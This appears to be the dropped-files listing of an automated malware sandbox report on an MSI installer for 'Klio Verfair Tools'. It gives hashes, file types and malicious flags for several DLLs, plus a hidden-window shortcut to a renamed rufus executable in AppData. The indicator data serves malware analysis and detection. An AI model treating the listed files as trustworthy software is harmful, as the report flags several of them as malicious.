                                                                                                                                                                                          SHA-512:6EF39EE8B7D40C5E6C0E79F8C4E846D431A6A87711D025122E2E7F060C5754FFF917771D5EDE6ADEC3BE909FB5CE0E8EB1DF5E18142ECDB6339BDDE8CE2C8398
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):5312000
                                                                                                                                                                                          Entropy (8bit):6.364538151451408
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:49152:qL1wrvfRIQkXfBe1IlA8gE+LGHEYXb3GNfsUd9QjqZztkJCP1pSN6WxHEmp+DnnV:61w7weOqiFIYBgTE
                                                                                                                                                                                          MD5:729614A3C92DBAE65381807AD0C6FE23
                                                                                                                                                                                          SHA1:E8CB4BFC8EF2814ED6480DEB852C0FEFB8FD3913
                                                                                                                                                                                          SHA-256:B4FC8C9B14234E9FCFB93F5AA163D8FD27966114E40D76A94089DCB16E61BC8B
                                                                                                                                                                                          SHA-512:1BA93F0719561462DDA60F8A5C92F866E93CEC0740D1D6D9FF9D21623446A9F9205267275192F337745C5C947E5F732140F4AF812DDA95058B4EEF8C2A7047B8
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):106
                                                                                                                                                                                          Entropy (8bit):4.724752649036734
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3:YD96WyV18tzsmyXLVi1rTVWSCwW2TJHzeZ18rY:Y8WyV18tAZLVmCwXFiZ18rY
                                                                                                                                                                                          MD5:8642DD3A87E2DE6E991FAE08458E302B
                                                                                                                                                                                          SHA1:9C06735C31CEC00600FD763A92F8112D085BD12A
                                                                                                                                                                                          SHA-256:32D83FF113FEF532A9F97E0D2831F8656628AB1C99E9060F0332B1532839AFD9
                                                                                                                                                                                          SHA-512:F5D37D1B45B006161E4CEFEEBBA1E33AF879A3A51D16EE3FF8C3968C0C36BBAFAE379BF9124C13310B77774C9CBB4FA53114E83F5B48B5314132736E5BB4496F
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:{"file_format_version": "1.0.0", "ICD": {"library_path": ".\\vk_swiftshader.dll", "api_version": "1.0.5"}}
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):21264
                                                                                                                                                                                          Entropy (8bit):6.666169407360595
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:384:u0A2poIjputb2IYiBpxDA/V1VF0hXHMGBk7/UMQ3aCHb:FSEuJYi3RA/V1VaXLkjTC7
                                                                                                                                                                                          MD5:4C9F3325972DDA2AB9E4298309E47775
                                                                                                                                                                                          SHA1:A5A31F4DDD4BFF7B9842440718B0C3C6B6A67A6B
                                                                                                                                                                                          SHA-256:7F5EC1B0361D044389804D176441E6F36B5E6533AC72095A53F0FFA5AB97C991
                                                                                                                                                                                          SHA-512:1EB268B05004E6AFD52CA664E2E0CB56BC1D426813B16E07266AF8A7B8F3AFC922DAB83D1281F854DA96224CFCF609D680F128E83CFD871C5058309B05E43C4D
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):149776
                                                                                                                                                                                          Entropy (8bit):6.5396839089543075
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3072:RMVrs97qCl+Fuydxe1nU0bv+qjwh/fk4etFAzWG3B7LEIsDLP0J:RMVrwqClLqyUev+mqg0WGRHjLJ
                                                                                                                                                                                          MD5:6F3E0AE63709A9ADD4A82341D8AABB4B
                                                                                                                                                                                          SHA1:C6370D212035E273F3E89BC75B4ED863E3104410
                                                                                                                                                                                          SHA-256:FF32FEBE7B50CA4309B5C688F043202750F2CAE8E55FE88F3731296D61EEBD3C
                                                                                                                                                                                          SHA-512:9A694736C3641A493E83F48EA4427CD833FFCA738E302E5D066567198FEE29161FC95BE36F18E55B03362161B32A7F59F43D94A7446C44A713A7C869C0F03DA6
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):125048
                                                                                                                                                                                          Entropy (8bit):4.074455267050186
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:384:gg6tcKRoEjS/ewCipkt9hjp11111111111111111111111111111111111111116:gHjqVhxYi3fPxWEp2W
                                                                                                                                                                                          MD5:C5AACCCB412A266329C6FEA32FDE0637
                                                                                                                                                                                          SHA1:2FE5F91CFB9EBEF2CEBEEC56C80E9BD3C7E37A22
                                                                                                                                                                                          SHA-256:A8A7DD19584A363CA7834EAD95E340CC95CC56FF58149D902205E583B942B240
                                                                                                                                                                                          SHA-512:18DFA9CF3CEC7705F401246CD4A12ED96C8BC4F58B3401957F25CED0E7613765FEAA4AADB0B2D47156150B4F437E3C03F66E9B11B9BB5B513FAA84279108DCA1
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):81304
                                                                                                                                                                                          Entropy (8bit):5.919580025846384
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:1536:G3jR7w5kUKbsUjgJewoMOA2k01ITAMLvJ5kNv42/wItn6NlzY:G3j+5kUKAmstJOZI7RSNv4Yw8WE
                                                                                                                                                                                          MD5:CFE4BCB28AEC046B3D322AEBB442C358
                                                                                                                                                                                          SHA1:53577839C5B56FB94EEF310F304EA746146F6A07
                                                                                                                                                                                          SHA-256:F19AD9DB3024F79ADC863474A1CD021686C8F75C04B0472A5BB7047D6AAB35BD
                                                                                                                                                                                          SHA-512:9BAA6D953E9E32E8874839E4754A0071F354D6045FB244CAF1753C77825FA0ED2FBE8A6B6030CE9688B904E9C234F0B7ADBFDF8062AFB960009CB9BB21348A2E
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):954368
                                                                                                                                                                                          Entropy (8bit):6.588967390706855
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:24576:4kMYSDIukxvnwhdzY96Z5WiDYsH56g3P0zAk7lEb:4ku0fwhC96Z5WiDYsH56g3P0zAk7l
                                                                                                                                                                                          MD5:958E05991BADA25C141FAC153EE5B685
                                                                                                                                                                                          SHA1:1EF98A7DC87AC54FE86FC24C7C47CA4F888D6B9D
                                                                                                                                                                                          SHA-256:55EDE647AC14337AE3A7107E5B5E4883B6B5D3A52944A0AFE75212E49BC31246
                                                                                                                                                                                          SHA-512:0AAD782DA9BC12149B716A5F6A875673A72E98C480F21296CB287144FD88BDD970233DD5287EA8F72AE69CDE47D8475AD4CC1A85B6FBEF56F6F82B77EF8C259A
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):101496
                                                                                                                                                                                          Entropy (8bit):6.718527877323426
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3072:a3T36oNDAYOpRQNjwlG/pXV5785DDKBOxj:a3T3JEYOjLlG/pXVZ8N
                                                                                                                                                                                          MD5:76D01D5CFCA8BC565C0ABC8B1B0ED9D2
                                                                                                                                                                                          SHA1:22BF364D5495CEAE0EE4421C813C00732886E0B0
                                                                                                                                                                                          SHA-256:30E559EF9D1DF6EBB7452AD8A24044100FCDB8F96C25905AF72962D4FA93B82F
                                                                                                                                                                                          SHA-512:393B75E5D6D219BBCB7DDED8B2F12B1C0CFDB7FDD4164EE244C9044E68F16ADEDB0F61142929FFB58CA6E4EED223E3DEC80473081E3EC57AC47A8698A71E0E9A
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Icon number=0, Archive, ctime=Sat Mar 8 06:57:16 2025, mtime=Tue Mar 25 19:01:55 2025, atime=Sat Mar 8 06:57:16 2025, length=1622832, window=hide
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):2154
                                                                                                                                                                                          Entropy (8bit):3.9252803156586102
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:24:8qfs8AZREjKjqbdt9p+SlEd6n8AU1sWlvk6OwwblnacPcdu1bH6OwwblnacP3vJr:8qx1jKjqbdt99auq85BaJdu1bH5BaIM
                                                                                                                                                                                          MD5:72943C56D240DFE0A310319A6B6497E0
                                                                                                                                                                                          SHA1:71B1C1592FCD9485D594552827D71B6FEB724007
                                                                                                                                                                                          SHA-256:1D161578CE490EF98C374A0268A0207A39194B32AF136403BFD2012A1DA1752F
                                                                                                                                                                                          SHA-512:18A9C16C7167F4A03BBB4312CBD272B059F4BE885F49EE9C7082C892B1BF8EE5532C69D3D595AFD1A7F0843B03FCEAAA5717194DBE32CDE76C86CB0FC5C0F8AD
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:L..................F.@.. .....`...............`.....0.......................H.:..DG..Yr?.D..U..k0.&...&...... M.............w~.........t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSlyZ6.....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....yZ:...Roaming.@......DWSlyZ:.....C......................:.R.o.a.m.i.n.g.....\.1.....yZ:...TASOVC~1..D......yZ:.yZ:............................:.T.a.s.o.v.C.o.o.p.....n.1.....yZ<...KLIOVE~1..V......yZ:.yZ<.....X......................Y.K.l.i.o. .V.e.r.f.a.i.r. .T.o.o.l.s.....j.2.0...hZ(? .RUFUS-~1.EXE..N......hZ(?yZ<.....nC........................r.u.f.u.s.-.4...6.p...e.x.e.......z...............-.......y..............e.....C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\rufus-4.6p.exe......\.r.u.f.u.s.-.4...6.p...e.x.e.=.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.T.a.s.o.v.C.o.o.p.\.K.l.i.o. .V.e.r.f.a.i.r. .T.o.o.l.s.\.h.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.R.o.a.m.
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Security: 0, Code page: 1252, Revision Number: {5573CB6A-FBB7-4DDB-BB6F-286B726CF22B}, Number of Words: 10, Subject: Klio Verfair Tools, Author: TasovCoop, Name of Creating Application: Klio Verfair Tools, Template: ;1033, Comments: This installer database contains the logic and data required to install Klio Verfair Tools., Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Sun Mar 23 16:43:52 2025, Last Saved Time/Date: Sun Mar 23 16:43:52 2025, Last Printed: Sun Mar 23 16:43:52 2025, Number of Pages: 450
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):65046016
                                                                                                                                                                                          Entropy (8bit):7.31982440208669
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:
                                                                                                                                                                                          MD5:CC9A4FBBBABAD106E40B7577F6DBBCC1
                                                                                                                                                                                          SHA1:4EDF9195188E721A7B5F394032DDB987144F918E
                                                                                                                                                                                          SHA-256:0B268732E81427C10AFAA9679C60485A5C8A71C839F268B6E0E0D7C57EFB3832
                                                                                                                                                                                          SHA-512:059A987598CD67F4603CCDB1721E136890BC07DA30527105E0A86BBF68BB657F1C9C32539E29D09524CB804496FD925931AA2EFCF8A7D373F1EF71318C4546BC
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                          Category:modified
                                                                                                                                                                                          Size (bytes):1021792
                                                                                                                                                                                          Entropy (8bit):6.608727172078022
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:24576:2Nmq6KGDx4JYKcP/+h0lhSMXl+GGXo8Wea/xwuX:Ymq6KGk/cHrOGGY8Wea/xwuX
                                                                                                                                                                                          MD5:EE09D6A1BB908B42C05FD0BEEB67DFD2
                                                                                                                                                                                          SHA1:1EB7C1304B7BCA649C2A5902B18A1EA57CEAA532
                                                                                                                                                                                          SHA-256:7BBF611F5E2A16439DC8CD11936F6364F6D5CC0044545C92775DA5646AFC7752
                                                                                                                                                                                          SHA-512:2DD2E4E66D2F2277F031C5F3C829A31C3B29196AB27262C6A8F1896A2113A1BE1687C9E8CD9667B89157F099DFB969EF14AE3EA602D4C772E960BC41D39C3D05
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):1021792
                                                                                                                                                                                          Entropy (8bit):6.608727172078022
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:24576:2Nmq6KGDx4JYKcP/+h0lhSMXl+GGXo8Wea/xwuX:Ymq6KGk/cHrOGGY8Wea/xwuX
                                                                                                                                                                                          MD5:EE09D6A1BB908B42C05FD0BEEB67DFD2
                                                                                                                                                                                          SHA1:1EB7C1304B7BCA649C2A5902B18A1EA57CEAA532
                                                                                                                                                                                          SHA-256:7BBF611F5E2A16439DC8CD11936F6364F6D5CC0044545C92775DA5646AFC7752
                                                                                                                                                                                          SHA-512:2DD2E4E66D2F2277F031C5F3C829A31C3B29196AB27262C6A8F1896A2113A1BE1687C9E8CD9667B89157F099DFB969EF14AE3EA602D4C772E960BC41D39C3D05
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):380520
                                                                                                                                                                                          Entropy (8bit):6.512348002260683
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:6144:ZSXJmYiFGLzkhEFeCPGi5B8dZ6t+6bUSfcqKgAST:ZSXJ9khElPGvcttbxpAST
                                                                                                                                                                                          MD5:FFDAACB43C074A8CB9A608C612D7540B
                                                                                                                                                                                          SHA1:8F054A7F77853DE365A7763D93933660E6E1A890
                                                                                                                                                                                          SHA-256:7484797EA4480BC71509FA28B16E607F82323E05C44F59FFA65DB3826ED1B388
                                                                                                                                                                                          SHA-512:A9BD31377F7A6ECF75B1D90648847CB83D8BD65AD0B408C4F8DE6EB50764EEF1402E7ACDFF375B7C3B07AC9F94184BD399A10A22418DB474908B5E7A1ADFE263
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):561652
                                                                                                                                                                                          Entropy (8bit):4.423935630223455
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3072:+AVWno2eoqXRy8QGSi6H0NOJe6ay1lrnyoeFM8UuPLZoELS/8taek6KYrOzzCIhS:fCANx6xPZX9mBdH
                                                                                                                                                                                          MD5:4809AA92785877A22D3B8A9A9DB2B5B1
                                                                                                                                                                                          SHA1:9A02687DC039A8262D0424EA0BB80806A676F0E1
                                                                                                                                                                                          SHA-256:F3DEB8B5166A652A918B4946F84EF8406D331F06615D51D6C770E47FF3CC6BBC
                                                                                                                                                                                          SHA-512:5936EF5E4C76840015C8B2656151876E5661032B8F83C33711B41E48AA4F594D5CD3B00232814131679F0422AE4209132A2A2341E8BD7A15130BA86C92D2B1D7
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:...@IXOS.@.....@:.yZ.@.....@.....@.....@.....@.....@......&.{3A2F5F1E-36B0-4920-A5FF-BCB162944D96}..Klio Verfair Tools..build.msi.@.....@.....@.....@......icon_23.exe..&.{5573CB6A-FBB7-4DDB-BB6F-286B726CF22B}.....@.....@.....@.....@.......@.....@.....@.......@......Klio Verfair Tools......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration...@,....@.....@.]....&.{7D0977D7-319F-41E6-AC22-4C628AFB5366}=.C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\.@.......@.....@.....@......&.{00541E92-B30A-43FA-9AD1-62A7BF8D6B85}1.01:\Software\TasovCoop\Klio Verfair Tools\Version.@.......@.....@.....@......&.{0A71947E-5499-4B27-8695-F2466C030D57}C.C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\7z.dll.@.......@.....@.....@......&.{40974B72-6EF2-4796-AFED-87826DA707E4}C.C:\Users\user\AppData\Roaming\TasovCoop\Klio Verfair Tools\7z.exe.@.......@.....@.....@......&.{F4E863DB
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):20480
                                                                                                                                                                                          Entropy (8bit):1.1621392096715766
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:12:JSbX72Fj9AGiLIlHVRpMh/7777777777777777777777777vDHFcOaPip3Xl0i8Q:JbQI5cCY6F
                                                                                                                                                                                          MD5:85DD879E5C97400565B3EA77E646521D
                                                                                                                                                                                          SHA1:85BBC6C87AC977289D5A7F3EE6986659E3C350F1
                                                                                                                                                                                          SHA-256:06DFB1D665148574C856C1E9930CA85E39D47E6F1D3320F048C189CE1AEB53E3
                                                                                                                                                                                          SHA-512:E6AFCA30342CB44232AF636CCB0CC286CE8D55CE648784845960C966C73377E8EF05BBCFDD86BD7D2308D4FDDF5E5787148FAD77E736EFC95E60D5285655C56B
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):20480
                                                                                                                                                                                          Entropy (8bit):1.5509684898091587
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:48:M8PhquRc06WXJ8jT5+tiJAAErCy6mSRvmySROT74Ba:jhq1fjTwYJvwCHmiOyiG8a
                                                                                                                                                                                          MD5:ED0C0936EE47E3E1B948915C94CE0A5A
                                                                                                                                                                                          SHA1:3C8E9205594295088B065FB30FCE74BB7D701423
                                                                                                                                                                                          SHA-256:763BD8FB55321BB49E5A7023FDE57BA879E4E39B6E21D0D3727CF08D3E0711FC
                                                                                                                                                                                          SHA-512:B7C91D781D98E78E1DDA47BB0790749E99F0567DD12AAC664829EF882E385ACA7D127894A22738BA30760A22D7B10D9AB0E927F40D09BB9681D80049F068B56C
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):364484
                                                                                                                                                                                          Entropy (8bit):5.365502104144754
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26KgauF:zTtbmkExhMJCIpEa
                                                                                                                                                                                          MD5:4FFC1ADDFB2F4D0F4624C639DDFBA731
                                                                                                                                                                                          SHA1:136E3638E75D17B5A64DE4649D62724741954032
                                                                                                                                                                                          SHA-256:20DF5DFEA9FDA5A22C64707838AF5F9D0065AC318C69860320B89D37BE3C298B
                                                                                                                                                                                          SHA-512:07EA8A51615A95047B7AAA21DC971581DC18AA248CABBFF0715585AE0E4E9DF471716F38AABD5D115F89F70ACDD701B9810D573B0E2E0D958106FD0736B02B8B
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):73728
                                                                                                                                                                                          Entropy (8bit):0.13277127836030628
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:24:vOwwblnacClOTx0WlyipV0WlY0WlAAEV0yjCymlmipV0WlvVQwGesz+KDx:CBalOTtySROAAErCy6mSRva/x
                                                                                                                                                                                          MD5:4A1D13066BAAA758561EA807B6DDAD33
                                                                                                                                                                                          SHA1:FB53C8404961F46ABA6064C5D3B7B22D792F39FB
                                                                                                                                                                                          SHA-256:597FC75B2D11C60BF4C4150DC80858368ED954AB72B4FD50DB4ED2402CFF6E45
                                                                                                                                                                                          SHA-512:DD47CC608A14117B21527D5F3ACC92E759BD85DDFB7F2C6337F7D14B75DC65364C015D5D8A48409C2B120E4AF7A0AD59F296FBDA708340A8C5036D23FB572103
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):512
                                                                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3::
                                                                                                                                                                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):512
                                                                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3::
                                                                                                                                                                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):32768
                                                                                                                                                                                          Entropy (8bit):1.2441380912920412
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:48:sjiukSI+CFXJXT5WtiJAAErCy6mSRvmySROT74Ba:WiFvTYYJvwCHmiOyiG8a
                                                                                                                                                                                          MD5:F9983A9EC8396C9981CF57BD86D4EA78
                                                                                                                                                                                          SHA1:F97BB58F3F5D64856A95DEBD893CECC45B4F48A8
                                                                                                                                                                                          SHA-256:694C61341DAAE8CFAA0B2976FF9D2C5C1ED659D53F6AA9AB2D4307199EF66E99
                                                                                                                                                                                          SHA-512:10DC57DA4A8A579B77F555F1504C1AE4A7A689663B848E5F059B3EE39E43513F0FB2569BC5F38BE099A92C4A5AA06964A2A50AA1ADBF16F204FC41501AA75628
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):32768
                                                                                                                                                                                          Entropy (8bit):1.2441380912920412
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:48:sjiukSI+CFXJXT5WtiJAAErCy6mSRvmySROT74Ba:WiFvTYYJvwCHmiOyiG8a
                                                                                                                                                                                          MD5:F9983A9EC8396C9981CF57BD86D4EA78
                                                                                                                                                                                          SHA1:F97BB58F3F5D64856A95DEBD893CECC45B4F48A8
                                                                                                                                                                                          SHA-256:694C61341DAAE8CFAA0B2976FF9D2C5C1ED659D53F6AA9AB2D4307199EF66E99
                                                                                                                                                                                          SHA-512:10DC57DA4A8A579B77F555F1504C1AE4A7A689663B848E5F059B3EE39E43513F0FB2569BC5F38BE099A92C4A5AA06964A2A50AA1ADBF16F204FC41501AA75628
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):512
                                                                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:3::
                                                                                                                                                                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):20480
                                                                                                                                                                                          Entropy (8bit):1.5509684898091587
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:48:M8PhquRc06WXJ8jT5+tiJAAErCy6mSRvmySROT74Ba:jhq1fjTwYJvwCHmiOyiG8a
                                                                                                                                                                                          MD5:ED0C0936EE47E3E1B948915C94CE0A5A
                                                                                                                                                                                          SHA1:3C8E9205594295088B065FB30FCE74BB7D701423
